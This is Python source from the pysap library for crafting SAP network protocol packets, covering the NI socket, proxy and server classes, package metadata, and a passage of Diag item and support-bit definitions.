from scapy.packet import Packet, Raw
from scapy.supersocket import socket, StreamSocket
# Custom imports
from pysap.utils import Worker


# Create a logger for the SAPNI layer
log_sapni = logging.getLogger("pysap.sapni")


class SAPNI(Packet):
    """SAP NI (Network Interface) packet

    This packet is used for craft Network Interface packets. It serves only
    as a container for packets in the different protocols. As this protocol
    is used by different protocols and the only way to differentiate each one
    is by the TCP port used, each script using the NI protocol must bind the
    respective layer with the respective protocol.

    For example, a script using the SAP Diag protocol must include the
    following binds::

        bind_layers(SAPNI,      SAPDiag, )
        bind_layers(SAPNI,      SAPDiagDP, )
        bind_layers(SAPDiagDP,  SAPDiag, )
        bind_layers(SAPDiag,    SAPDiagItem, )
        bind_layers(SAPDiagItem,SAPDiagItem, )

    """
    name = "SAP NI (Network Interface) protocol"
    fields_desc = [LenField("length", None, fmt="!I")]

    # Constants for keep-alive messages
    SAPNI_PING = "NI_PING\x00"
    """ @cvar: Constant for keep-alive request messages (NI_PING)
        @type: C{string} """

    SAPNI_PONG = "NI_PONG\x00"
    """ @cvar: Constant for keep-alive response messages (NI_PONG)
        @type: C{string} """


class SAPNIStreamSocket(StreamSocket):
    """Stream socket implementation of the SAP Network Interface (NI) layer.

    """

    desc = "NI Stream socket"

    def __init__(self, sock, keep_alive=True, base_cls=None):
        """Initializes the NI stream socket.

        @param sock: socket to wrap
        @type sock: C{socket}

        @param keep_alive: if true, the socket will automatically respond to
            keep-alive request messages. Otherwise, the keep-alive messages
            are passed to the caller in L{recv} and L{sr} calls.
        @type keep_alive: C{bool}

        @param base_cls: the base class to use when receiving packets, it uses
            L{SAPNI} as default if no class specified
        @type base_cls: L{Packet} class
        """
        StreamSocket.__init__(self, sock, Raw)
        self.keep_alive = keep_alive
        self.basecls = base_cls

    def send(self, packet):
        """Send a packet at the NI layer, prepending the length field.

        @param packet: packet to send
        @type packet: Packet
        """
        # Add the NI layer and send
        log_sapni.debug("To send %d bytes", len(packet) + 4)
        return StreamSocket.send(self, SAPNI() / packet)

    def recv(self):
        """Receive a packet at the NI layer, first reading the length field and
        the reading the data. If the stream is waiting for a new packet and
        the remote peer sends a keep-alive request (L{NI_PING<SAPNI.SAPNI_PING>}),
        the receive method will respond with a keep-alive response
        (L{NI_PONG<SAPNI.SAPNI_PONG>}) to keep the communication stable.

        @return: received L{SAPNI} packet
        @rtype: L{SAPNI}

        @raise socket.error: if the connection was close
        """
        # Receive the NI length field
        nidata = self.ins.recv(4, socket.MSG_PEEK)
        if len(nidata) == 0:
            raise socket.error((100, "Underlying stream socket tore down"))
        (nilength, ) = unpack("!I", nidata)
        log_sapni.debug("To receive %d bytes", nilength)

        # Receive the whole NI packet (length+payload)
        nidata = ''
        while(len(nidata) < nilength + 4):
            nidata += self.ins.recv(nilength - len(nidata) + 4)
            if (len(nidata) == 0):
                raise socket.error((100, "Underlying stream socket tore down"))

        # If the packet received is a keep-alive request (NI_PING), send a
        # response (NI_PONG) and make a new receive call
        if nilength == len(SAPNI.SAPNI_PING) and nidata[4:] == SAPNI.SAPNI_PING:
            log_sapni.debug("Received NI_PING")
            if self.keep_alive:
                log_sapni.debug("Keep alive set, sending NI_PONG")
                self.send(Raw(SAPNI.SAPNI_PONG))
                return self.recv()

        # Build the SAPNI packet with the received data
        log_sapni.debug("Received %d bytes", nilength)

        # Decode the packet payload according to the base class defined
        packet = SAPNI(nidata)
        if self.basecls:
            packet.decode_payload_as(self.basecls)
        return packet

    def sr(self, packet):
        """Send a given packet and receive the response. Wrapper around the send
        and receive methods. The response packet is build in the L{SAPNI} layer.

        @param packet: packet to send
        @type packet: Packet

        @return: packet received
        @rtype: Packet
        """
        self.send(packet)
        return self.recv()

    @classmethod
    def get_nisocket(cls, host, port, **kwargs):
        """Helper function to obtain a L{SAPNIStreamSocket}.

        @param host: host to connect to
        @type host: C{string}

        @param port: port to connect to
        @type port: C{int}

        @keyword kwargs: arguments to pass to L{SAPNIStreamSocket} constructor

        @return: connected socket
        @rtype: L{SAPNIStreamSocket}

        @raise socket.error: if the connection to the target host/port failed
        """
        sock = socket.create_connection((host, port))
        return cls(sock, **kwargs)


class SAPNIProxy(object):
    """SAP NI Proxy

    It works by setting a listener L{SAPNIStreamSocket} and dispatching client's
    requests to a given handler class.

    Example usage::
        proxy = SAPNIProxy(local_host, local_port, remote_host, remote_port, handler_class)
        proxy.handle_connection()
    """

    def __init__(self, bind_address, bind_port, remote_address, remote_port,
                 handler, backlog=5, keep_alive=True, options=None):
        """Create the proxy binding a socket in the giving port and setting the
        handler for the incoming connections.

        @param bind_address: address to bind the listener socket
        @type bind_address: C{string}

        @param bind_port: port to bind the listener socket
        @type bind_port: C{int}

        @param remote_address: remote address to connect to
        @param remote_address: C{string}

        @param remote_port: remote port to connect to
        @type remote_port: C{int}

        @param handler: handler class
        @type handler: L{SAPNIProxyHandler} class

        @param backlog: backlog parameter to set in the listener socket
        @type backlog: C{int}

        @param keep_alive:  if true, the proxy will handle the keep-alive
            requests and responses. Otherwise, keep-alive messages are passed
            to the handler as regular packets.
        @type keep_alive: C{bool}

        @param options: options to pass to the handler instance
        @type options: C{dict}
        """
        self.remote_host = (remote_address, remote_port)
        self.handler = handler
        self.keep_alive = keep_alive
        self.options = options

        # Create and bind the listener socket
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind((bind_address, bind_port))
        sock.listen(backlog)

        # Create the NI Stream Socket
        self.listener = SAPNIStreamSocket(sock, keep_alive)

        log_sapni.debug("SAPNIProxy: Binded to address %s:%d, proxying to %s:%d",
                        bind_address, bind_port, remote_address, remote_port)

    def handle_connection(self):
        """Block until a connection is received from the listener and handle that
        client using the provided handler class.

        @return: the handler instance handling the request
        @rtype: L{SAPNIProxyHandler}
        """
        # Accept a client connection
        (client, address) = self.listener.ins.accept()

        # Creates a remote socket
        remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        remote.connect(self.remote_host)

        # Create the NI Stream Socket and handle it
        proxy = self.handler(SAPNIStreamSocket(client, self.keep_alive),
                             SAPNIStreamSocket(remote, self.keep_alive),
                             self.options)

        log_sapni.debug("SAPNIProxy: Handled a connection from %s", address)
        return proxy

    def stop(self):
        """Stop the proxy by closing the listener socket."""
        self.listener.close()


class SAPNIProxyHandler(object):
    """SAP NI Proxy Handler

    Handles NI packets. Works spawning one thread for processing data coming
    from each pair of client/server.
    """

    def __init__(self, client, server, options=None):
        """It receives two L{SAPNIStreamSocket}s objects and creates the worker
        for processing data. Thread is started as daemon.

        @param client: client Stream Socket
        @type client: L{SAPNIStreamSocket}

        @param server: server Stream Socket
        @type server: L{SAPNIStreamSocket}

        @param options: options received from the proxy
        @type options: C{dict}
        """
        self.client = client
        self.server = server
        self.poll_interval = 0.5

        self.processor = Worker(self, self._handle)
        self.processor.daemon = True
        self.processor.start()

    def recv_send(self, local, remote, process):
        """Receives data from one socket connection, process it and send to the
        remote connection.

        @param local: the local socket
        @type local: L{SAPNIStreamSocket}

        @param remote: the remote socket
        @type remote: L{SAPNIStreamSocket}

        @param process: the function that process the incoming data
        @type process: function
        """
        # Receive a SAP NI packet
        packet = local.recv()
        log_sapni.debug("SAPNIProxyHandler: Received %d bytes", len(packet))

        # Process the packet using the given function
        packet = process(packet)

        # Send the packet to the remote peer
        remote.send(packet.payload)
        log_sapni.debug("SAPNIProxyHandler: Sent %d bytes", len(packet))

    def _handle(self):
        """Handles data coming from either the client or the server"""
        r, __, __ = select([self.client, self.server], [], [], self.poll_interval)
        if self.client in r:
            try:
                log_sapni.debug("SAPNIProxyHandler: Client --> Server connection")
                self.recv_send(self.client, self.server, self.process_client)
            except socket.error:
                log_sapni.error("SAPNIProxyHandler: Client connection down")
                self.stop_workers()
        if self.server in r:
            try:
                log_sapni.debug("SAPNIProxyHandler: Client <-- Server connection")
                self.recv_send(self.server, self.client, self.process_server)
            except socket.error:
                log_sapni.error("SAPNIProxyHandler: Server connection down")
                self.stop_workers()

    def process_client(self, packet):
        """This method is called each time a packet arrives from the client.
        It must return a packet in the same layer (L{SAPNI}). Stub method
        to be overloaded in subclasses.

        @param packet: the packet to be processed
        @type packet: Packet
        """
        return packet

    def process_server(self, packet):
        """This method is called each time a packet arrives from the server.
        It must return a packet in the same layer (L{SAPNI}). Stub method
        to be overloaded in subclasses.

        @param packet: the packet to be processed
        @type packet: Packet
        """
        return packet

    def stop_workers(self):
        """Stop the processor workers"""
        self.client.close()
        self.server.close()
        self.processor.stop()


class SAPNIClient(object):
    """Stub class for a client connecting to the SAP NI server.
    """


class SAPNIServer(TCPServer):
    """Base SAP NI Server class.

    Subclasses must define a client class for keeping state information
    on the connected clients.

    Example usage::
        server = SAPNIServer((local_host, local_port), handler_class)
        server.client_cls = client_class
        server.serve_forever()
    """

    clients_cls = SAPNIClient
    """ @cvar: Client class for storing data about new clients
        @type: L{SAPNIClient} class """

    options = None
    """ @ivar: Options to pass to the request handler
        @type: C{object} """

    def __init__(self, server_address, RequestHandlerClass,
                 bind_and_activate=True, socket_cls=None, keep_alive=True,
                 base_cls=None):
        """ """
        self.socket_cls = socket_cls or SAPNIStreamSocket
        self.keep_alive = keep_alive
        self.base_cls = base_cls
        self.clients = {}
        TCPServer.__init__(self, server_address, RequestHandlerClass,
                           bind_and_activate=bind_and_activate)

    def handle_error(self, request, client_address):
        log_sapni.exception("SAPNIServer: Client connection error: %s", sys.exc_info()[1])

    def get_request(self):
        """Wrap the socket object with a L{SAPNIStreamSocket} after accepting
        a connection.
        """
        socket, addr = self.socket.accept()
        socket = self.socket_cls(socket,
                                 keep_alive=self.keep_alive,
                                 base_cls=self.base_cls)
        return socket, addr

    def shutdown_request(self, request):
        """Called to shutdown and close an individual request."""
        try:
            request.ins.shutdown(socket.SHUT_WR)
        except socket.error:
            pass
        self.close_request(request)


class SAPNIServerThreaded(ThreadingMixIn, SAPNIServer):
    """A SAP NI Server implementation using threading """


class SAPNIServerHandler(BaseRequestHandler):
    """SAP NI Server Handler

    Handles L{SAPNI} packets coming from a L{SAPNIServer}.
    """

    def setup(self):
        """Setup a new client connection. Creates a new client object for
        keeping state information of each client on the server instance.
        """
        if self.client_address not in list(self.server.clients.keys()):
            self.server.clients[self.client_address] = self.server.clients_cls()
            log_sapni.debug("SAPNIServerHandler: New client %s",
                            self.client_address)
        self.closed = Event()

    def close(self):
        """Close a client connection and deletes the client from the state
        information on the server.
        """
        if self.client_address in self.server.clients:
            del(self.server.clients[self.client_address])
        self.closed.set()
        log_sapni.debug("SAPNIServerHandler: Bye client %s", self.client_address)

    def handle(self):
        """Handle a client connection. The handler assumes the client connection
        is a L{SAPNIStreamSocket} object. After received a L{SAPNI} packet, it
        stores it on the 'packet' instance variable and pass the control to the
        handle_data method.
        """
        while not self.closed.is_set():
            log_sapni.debug("SAPNIServerHandler: Handling data from %s",
                            self.client_address)

            # Receive and store the packet
            self.packet = self.request.recv()

            log_sapni.debug("SAPNIServerHandler: Request received")
            # Pass the control to the handle_data function
            self.handle_data()

    def handle_data(self):
        """Handle the data coming from the client. The L{SAPNI} packet is stored
        on data and client information on client_address instance variables.
        Stub method to be overloaded in subclasses.
        """
        pass



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

"""
pysap
=====

pysap is a Python library for communicating using SAP network protocols.

Currently the following SAP protocols are included:
    - SAP NI (Network Interface).
    - SAP Diag.
    - SAP Enqueue Server.
    - SAP Message Server.
    - SAP Router.
    - SAP RFC.

:copyright: (c) 2015 by Martin Gallo, Core Security.
:license: GNU General Public License v2 or later (GPLv2+).

"""

__title__ = 'pysap'
"""The title of the library"""

__version__ = '0.1.6'
"""The version of pysap"""

__url__ = "http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=pysap"
"""The URL for pysap's homepage"""

__repo__ = "https://github.com/CoreSecurity/pysap"
"""The URL for pysap's repository"""

__license__ = "GNU General Public License v2 or later (GPLv2+)"
"""The license governing the use and distribution of pysap"""



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
from struct import pack
from binascii import unhexlify as unhex
# External imports
from scapy.packet import Packet
from scapy.fields import (IntField, BitField, ShortField, ByteField,
                          ConditionalField, StrLenField, StrField,
                          StrNullField, FieldLenField, PacketListField,
                          FieldListField)
# Custom imports
from pysap.SAPDiag import bind_diagitem, SAPDiagItem
from pysap.utils import PacketNoPadded, ByteEnumKeysField, ShortEnumKeysField


# Diag User connect item
#
# Protocol version (int):   100200  0x00018768 SAP Diag Compressed
#                           000200  0x000000c8 SAP Diag No Compressed
# CodePage (int):           1100    0x0000044c Code Page 1100
# WS Type (int):            5001    0x00001389 SAP GUI Java
#                           3000    0x00000bb8 SAP GUI Windows
#
class SAPDiagUserConnect(Packet):
    name = "SAP Diag User Connect"
    fields_desc = [IntField("protocol_version", 100200),
                   IntField("code_page", 1100),
                   IntField("ws_type", 5001)]

bind_diagitem(SAPDiagUserConnect, "APPL", 0x04, 0x02)

user_connect_compressed = \
    SAPDiagItem(item_type="APPL",
                item_id="ST_USER",
                item_sid=0x02,
                item_value=SAPDiagUserConnect())

user_connect_uncompressed = \
    SAPDiagItem(item_type="APPL",
                item_id="ST_USER",
                item_sid=0x02,
                item_value=SAPDiagUserConnect(protocol_version=000200))


# Diag Dialog step item
class SAPDiagStep(Packet):
    name = "SAP Diag Dialog Step"
    fields_desc = [IntField("step", 0)]

bind_diagitem(SAPDiagStep, "APPL", 0x04, 0x26)


# Diag Support data (support bits)
class SAPDiagSupportBits(Packet):
    name = "SAP Diag Support Bits"
    fields_desc = [
        BitField("PROGRESS_INDICATOR", 0, 1),    # 0
        BitField("SAPGUI_LABELS", 0, 1),    # 1
        BitField("SAPGUI_DIAGVERSION", 0, 1),    # 2
        BitField("SAPGUI_SELECT_RECT", 0, 1),    # 3
        BitField("SAPGUI_SYMBOL_RIGHT", 0, 1),    # 4
        BitField("SAPGUI_FONT_METRIC", 0, 1),    # 5
        BitField("SAPGUI_COMPR_ENHANCED", 0, 1),    # 6
        BitField("SAPGUI_IMODE", 0, 1),    # 7

        BitField("SAPGUI_LONG_MESSAGE", 0, 1),    # 8
        BitField("SAPGUI_TABLE", 0, 1),    # 9
        BitField("SAPGUI_FOCUS_1", 0, 1),    # 10
        BitField("SAPGUI_PUSHBUTTON_1", 0, 1),    # 11
        BitField("UPPERCASE", 0, 1),    # 12
        BitField("SAPGUI_TABPROPERTY", 0, 1),    # 13
        BitField("INPUT_UPPERCASE", 0, 1),    # 14
        BitField("RFC_DIALOG", 0, 1),    # 15

        BitField("LIST_HOTSPOT", 0, 1),    # 16
        BitField("FKEY_TABLE", 0, 1),    # 17
        BitField("MENU_SHORTCUT", 0, 1),    # 18
        BitField("STOP_TRANS", 0, 1),    # 19
        BitField("FULL_MENU", 0, 1),    # 20
        BitField("OBJECT_NAMES", 0, 1),    # 21
        BitField("CONTAINER_TYPE", 0, 1),    # 22
        BitField("DLGH_FLAGS", 0, 1),    # 23

        BitField("APPL_MNU", 0, 1),    # 24
        BitField("MESSAGE_INFO", 0, 1),    # 25
        BitField("MESDUM_FLAG1", 0, 1),    # 26
        BitField("TABSEL_ATTRIB", 0, 1),    # 27
        BitField("GUIAPI", 0, 1),    # 28
        BitField("NOGRAPH", 0, 1),    # 29
        BitField("NOMESSAGES", 0, 1),    # 30
        BitField("NORABAX", 0, 1),    # 31

        BitField("NOSYSMSG", 0, 1),    # 32
        BitField("NOSAPSCRIPT", 0, 1),    # 33
        BitField("NORFC", 0, 1),    # 34
        BitField("NEW_BSD_JUSTRIGHT", 0, 1),    # 35
        BitField("MESSAGE_VARS", 0, 1),    # 36
        BitField("OCX_SUPPORT", 0, 1),    # 37
        BitField("SCROLL_INFOS", 0, 1),    # 38
        BitField("TABLE_SIZE_OK", 0, 1),    # 39

        BitField("MESSAGE_INFO2", 0, 1),    # 40
        BitField("VARINFO_OKCODE", 0, 1),    # 41
        BitField("CURR_TCODE", 0, 1),    # 42
        BitField("CONN_WSIZE", 0, 1),    # 43
        BitField("PUSHBUTTON_2", 0, 1),    # 44
        BitField("TABSTRIP", 0, 1),    # 45
        BitField("UNKNOWN_1", 0, 1),    # 46 (Unknown support bit)
        BitField("TABSCROLL_INFOS", 0, 1),    # 47

        BitField("TABLE_FIELD_NAMES", 0, 1),    # 48
        BitField("NEW_MODE_REQUEST", 0, 1),    # 49
        BitField("RFCBLOB_DIAG_PARSER", 0, 1),    # 50
        BitField("MULTI_LOGIN_USER", 0, 1),    # 51
        BitField("CONTROL_CONTAINER", 0, 1),    # 52
        BitField("APPTOOLBAR_FIXED", 0, 1),    # 53
        BitField("R3INFO_USER_CHECKED", 0, 1),    # 54
        BitField("NEED_STDDYNPRO", 0, 1),    # 55

        BitField("TYPE_SERVER", 0, 1),    # 56
        BitField("COMBOBOX", 0, 1),    # 57
        BitField("INPUT_REQUIRED", 0, 1),    # 58
        BitField("ISO_LANGUAGE", 0, 1),    # 59
        BitField("COMBOBOX_TABLE", 0, 1),    # 60
        BitField("R3INFO_FLAGS", 0, 1),    # 61
        BitField("CHECKRADIO_EVENTS", 0, 1),    # 62
        BitField("R3INFO_USERID", 0, 1),    # 63

        BitField("R3INFO_ROLLCOUNT", 0, 1),    # 64
        BitField("USER_TURNTIME2", 0, 1),    # 65
        BitField("NUM_FIELD", 0, 1),    # 66
        BitField("WIN16", 0, 1),    # 67
        BitField("CONTEXT_MENU", 0, 1),    # 68
        BitField("SCROLLABLE_TABSTRIP_PAGE", 0, 1),    # 69
        BitField("EVENT_DESCRIPTION", 0, 1),    # 70
        BitField("LABEL_OWNER", 0, 1),    # 71

        BitField("CLICKABLE_FIELD", 0, 1),    # 72
        BitField("PROPERTY_BAG", 0, 1),    # 73
        BitField("UNUSED_1", 0, 1),    # 74
        BitField("TABLE_ROW_REFERENCES_2", 0, 1),    # 75
        BitField("PROPFONT_VALID", 0, 1),    # 76
        BitField("VARINFO_CONTAINER", 0, 1),    # 77
        BitField("R3INFO_IMODEUUID", 0, 1),    # 78
        BitField("NOTGUI", 0, 1),    # 79

        BitField("WAN", 0, 1),    # 80
        BitField("XML_BLOBS", 0, 1),    # 81
        BitField("RFC_QUEUE", 0, 1),    # 82
        BitField("RFC_COMPRESS", 0, 1),    # 83
        BitField("JAVA_BEANS", 0, 1),    # 84
        BitField("DPLOADONDEMAND", 0, 1),    # 85
        BitField("CTL_PROPCACHE", 0, 1),    # 86
        BitField("ENJOY_IMODEUUID", 0, 1),    # 87

        BitField("RFC_ASYNC_BLOB", 0, 1),    # 88
        BitField("KEEP_SCROLLPOS", 0, 1),    # 89
        BitField("UNUSED_2", 0, 1),    # 90
        BitField("UNUSED_3", 0, 1),    # 91
        BitField("XML_PROPERTIES", 0, 1),    # 92
        BitField("UNUSED_4", 0, 1),    # 93
        BitField("HEX_FIELD", 0, 1),    # 94
        BitField("HAS_CACHE", 0, 1),    # 95

        BitField("XML_PROP_TABLE", 0, 1),    # 96
        BitField("UNUSED_5", 0, 1),    # 97
        BitField("ENJOY_IMODEUUID2", 0, 1),    # 98
        BitField("ITS", 0, 1),    # 99
        BitField("NO_EASYACCESS", 0, 1),    # 100
        BitField("PROPERTYPUMP", 0, 1),    # 101
        BitField("COOKIE", 0, 1),    # 102
        BitField("UNUSED_6", 0, 1),    # 103

        BitField("SUPPBIT_AREA_SIZE", 0, 1),    # 104
        BitField("DPLOADONDEMAND_WRITE", 0, 1),    # 105
        BitField("CONTROL_FOCUS", 0, 1),    # 106
        BitField("ENTRY_HISTORY", 0, 1),    # 107
        BitField("AUTO_CODEPAGE", 0, 1),    # 108
        BitField("CACHED_VSETS", 0, 1),    # 109
        BitField("EMERGENCY_REPAIR", 0, 1),    # 110
        BitField("AREA2FRONT", 0, 1),    # 111

        BitField("SCROLLBAR_WIDTH", 0, 1),    # 112
        BitField("AUTORESIZE", 0, 1),    # 113
        BitField("EDIT_VARLEN", 0, 1),    # 114
        BitField("WORKPLACE", 0, 1),    # 115
        BitField("PRINTDATA", 0, 1),    # 116
        BitField("UNKNOWN_2", 0, 1),    # 117 (Unknown support bit)
        BitField("SINGLE_SESSION", 0, 1),    # 118
        BitField("NOTIFY_NEWMODE", 0, 1),    # 119

        BitField("TOOLBAR_HEIGHT", 0, 1),    # 120
        BitField("XMLPROP_CONTAINER", 0, 1),    # 121
        BitField("XMLPROP_DYNPRO", 0, 1),    # 122
        BitField("DP_HTTP_PUT", 0, 1),    # 123
        BitField("DYNAMIC_PASSPORT", 0, 1),    # 124
        BitField("WEBGUI", 0, 1),    # 125
        BitField("WEBGUI_HELPMODE", 0, 1),    # 126
        BitField("CONTROL_FOCUS_ON_LIST", 0, 1),    # 127

        BitField("CBU_RBUDUMMY_2", 0, 1),    # 128
        BitField("EOKDUMMY_1", 0, 1),    # 129
        BitField("GUI_USER_SCRIPTING", 0, 1),    # 130
        BitField("SLC", 0, 1),    # 131
        BitField("ACCESSIBILITY", 0, 1),    # 132
        BitField("ECATT", 0, 1),    # 133
        BitField("ENJOY_IMODEUUID3", 0, 1),    # 134
        BitField("ENABLE_UTF8", 0, 1),    # 135

        BitField("R3INFO_AUTOLOGOUT_TIME", 0, 1),    # 136
        BitField("VARINFO_ICON_TITLE_LIST", 0, 1),    # 137
        BitField("ENABLE_UTF16BE", 0, 1),    # 138
        BitField("ENABLE_UTF16LE", 0, 1),    # 139
        BitField("R3INFO_CODEPAGE_APP", 0, 1),    # 140
        BitField("ENABLE_APPL4", 0, 1),    # 141
        BitField("GUIPATCHLEVEL", 0, 1),    # 142
        BitField("CBURBU_NEW_STATE", 0, 1),    # 143

        BitField("BINARY_EVENTID", 0, 1),    # 144
        BitField("GUI_THEME", 0, 1),    # 145
        BitField("TOP_WINDOW", 0, 1),    # 146
        BitField("EVENT_DESCRIPTION_1", 0, 1),    # 147
        BitField("SPLITTER", 0, 1),    # 148
        BitField("VALUE_4_HISTORY", 0, 1),    # 149
        BitField("ACC_LIST", 0, 1),    # 150
        BitField("GUI_USER_SCRIPTING_INFO", 0, 1),    # 151

        BitField("TEXTEDIT_STREAM", 0, 1),    # 152
        BitField("DYNT_NOFOCUS", 0, 1),    # 153
        BitField("R3INFO_CODEPAGE_APP_1", 0, 1),    # 154
        BitField("FRAME_1", 0, 1),    # 155
        BitField("TICKET4GUI", 0, 1),    # 156
        BitField("ACC_LIST_PROPS", 0, 1),    # 157
        BitField("TABSEL_ATTRIB_INPUT", 0, 1),    # 158
        BitField("DEFAULT_TOOLTIP", 0, 1),    # 159

        BitField("XML_PROP_TABLE_2", 0, 1),    # 160
        BitField("CBU_RBUDUMMY_3", 0, 1),    # 161
        BitField("CELLINFO", 0, 1),    # 162
        BitField("CONTROL_FOCUS_ON_LIST_2", 0, 1),    # 163
        BitField("TABLE_COLUMNWIDTH_INPUT", 0, 1),    # 164
        BitField("ITS_PLUGIN", 0, 1),    # 165
        BitField("OBJECT_NAMES_4_LOGIN_PROCESS", 0, 1),    # 166
        BitField("RFC_SERVER_4_GUI", 0, 1),    # 167

        BitField("R3INFO_FLAGS_2", 0, 1),    # 168
        BitField("RCUI", 0, 1),    # 169
        BitField("MENUENTRY_WITH_FCODE", 0, 1),    # 170
        BitField("WEBSAPCONSOLE", 0, 1),    # 171
        BitField("R3INFO_KERNEL_VERSION", 0, 1),    # 172
        BitField("VARINFO_CONTAINER_LOOP", 0, 1),    # 173
        BitField("EOKDUMMY_2", 0, 1),    # 174
        BitField("MESSAGE_INFO3", 0, 1),    # 175

        BitField("SBA2", 0, 1),    # 176
        BitField("MAINAREA_SIZE", 0, 1),    # 177
        BitField("GUIPATCHLEVEL_2", 0, 1),    # 178
        BitField("DISPLAY_SIZE", 0, 1),    # 179
        BitField("GUI_PACKET", 0, 1),    # 180
        BitField("DIALOG_STEP_NUMBER", 0, 1),    # 181
        BitField("TC_KEEP_SCROLL_POSITION", 0, 1),    # 182
        BitField("MESSAGE_SERVICE_REQUEST", 0, 1),    # 183

        BitField("DYNT_FOCUS_FRAME", 0, 1),    # 184
        BitField("MAX_STRING_LEN", 0, 1),    # 185
        BitField("VARINFO_CONTAINER_1", 0, 1),    # 186
        BitField("STD_TOOLBAR_ITEMS", 0, 1),    # 187
        BitField("XMLPROP_LIST_DYNPRO", 0, 1),    # 188
        BitField("TRACE_GUI_CONNECT", 0, 1),    # 189
        BitField("LIST_FULLWIDTH", 0, 1),    # 190
        BitField("ALLWAYS_SEND_CLIENT", 0, 1),    # 191

        BitField("UNKNOWN_3", 0, 1),    # 192 (Unknown support bit)
        BitField("GUI_SIGNATURE_COLOR", 0, 1),    # 193
        BitField("MAX_WSIZE", 0, 1),    # 194

        BitField("padding_bits", 0, 61), ]

bind_diagitem(SAPDiagSupportBits, "APPL", 0x04, 0x0b)
bind_diagitem(SAPDiagSupportBits, "APPL", 0x06, 0x11)


# Support Bits for common SAP Software versions
#
# SAPGUI 7.02 Java rev 5:           ff7ffe2ddab737d674087e1305971597eff23f8d0770ff0f0000000000000000
# SAPGUI 7.02 Java rev 2:           ff7ffe2ddab737d674087e1305971597eff23f8d0770ff030000000000000000
# SAPGUI 7.02 Windows:              ff7ffa0d78b737def6196e9325bf1593ef73feebdb51ed010000000000000000
# SAPGUI 7.01 Windows:              ff7ffa0d78b737def6196e9325bf1593ef73feebdb5501000000000000000000
# SAPGUI 7.30 Windows:              ff7ffa0d78b737def6196e9325bf1597ef73feebdb51ed910200000000000000
#
# SAP EHP 1 for SAP Netweaver 7.0:  ff7ffe2dd8b737d674087e1305971597ebf22f8d03300f000000000000000000
# SAP EHP 2 for SAP NetWeaver 7.0:  ff7ffe2dd8b737d674087e1305971597ebf23f8d0370ff0f0000000000000000
#

support_data_sapgui_701_win = SAPDiagSupportBits(unhex("ff7ffa0d78b737def6196e9325bf1593ef73feebdb5501000000000000000000"))
support_data_sapgui_702_win = SAPDiagSupportBits(unhex("ff7ffa0d78b737def6196e9325bf1593ef73feebdb51ed010000000000000000"))
support_data_sapgui_730_win = SAPDiagSupportBits(unhex("ff7ffa0d78b737def6196e9325bf1597ef73feebdb51ed910200000000000000"))
support_data_sapgui_702_java2 = SAPDiagSupportBits(unhex("ff7ffe2ddab737d674087e1305971597eff23f8d0770ff030000000000000000"))
support_data_sapgui_702_java5 = SAPDiagSupportBits(unhex("ff7ffe2ddab737d674087e1305971597eff23f8d0770ff0f0000000000000000"))
support_data_sapnw_701 = SAPDiagSupportBits(unhex("ff7ffe2dd8b737d674087e1305971597ebf22f8d03300f000000000000000000"))
support_data_sapnw_702 = SAPDiagSupportBits(unhex("ff7ffe2dd8b737d674087e1305971597ebf23f8d0370ff0f0000000000000000"))

support_data = SAPDiagItem(item_type="APPL",
                           item_id="ST_USER",
                           item_sid="SUPPORTDATA",
                           item_value=support_data_sapgui_702_java5)


# Dynt Atom item types
diag_atom_etypes = {
    101: "DIAG_DGOTYP_EFIELD",
    102: "DIAG_DGOTYP_OFIELD",
    103: "DIAG_DGOTYP_KEYWORD",
    104: "DIAG_DGOTYP_CHECKBUTTON_4",
    105: "DIAG_DGOTYP_RADIOBUTTON_0",
    106: "DIAG_DGOTYP_PUSHBUTTON_3",
    107: "DIAG_DGOTYP_FRAME_3",
    108: "DIAG_DGOTYP_LOOP_6",
    109: "DIAG_DGOTYP_SUBSCREEN",
    111: "DIAG_DGOTYP_PROPERTY",
    112: "DIAG_DGOTYP_ICON_0",
    113: "DIAG_DGOTYP_PUSHBUTTON_1",
    114: "DIAG_DGOTYP_FNAME",
    115: "DIAG_DGOTYP_PUSHBUTTON_2",
    116: "DIAG_DGOTYP_TABSTRIP_BUTTON",
    117: "DIAG_DGOTYP_COMBOBOX",
    118: "DIAG_DGOTYP_CHECKBUTTON_1",
    119: "DIAG_DGOTYP_RADIOBUTTON_1",
    120: "DIAG_DGOTYP_XMLPROP",
    121: "DIAG_DGOTYP_EFIELD_1",
    122: "DIAG_DGOTYP_OFIELD_1",
    123: "DIAG_DGOTYP_KEYWORD_1_1",
    124: "DIAG_DGOTYP_CHECKBUTTON_2",
    125: "DIAG_DGOTYP_RADIOBUTTON__0",
    126: "DIAG_DGOTYP_COMBOBOX_1",
    127: "DIAG_DGOTYP_FRAME_1",
    128: "DIAG_DGOTYP_CHECKBUTTON_3",
    129: "DIAG_DGOTYP_RADIOBUTTON_3",
    130: "DIAG_DGOTYP_EFIELD_2",
    131: "DIAG_DGOTYP_OFIELD_2",
    132: "DIAG_DGOTYP_KEYWORD_2",
}
"""Dynt Atom item types"""


# Diag Dynt Atom items
class SAPDiagDyntAtomItem(PacketNoPadded):
    name = "SAP Diag Dynt Atom item"
    fields_desc = [
        ShortField("atom_length", 0),
        ByteField("dlg_flag_1", 0),
        ByteField("dlg_flag_2", 0),
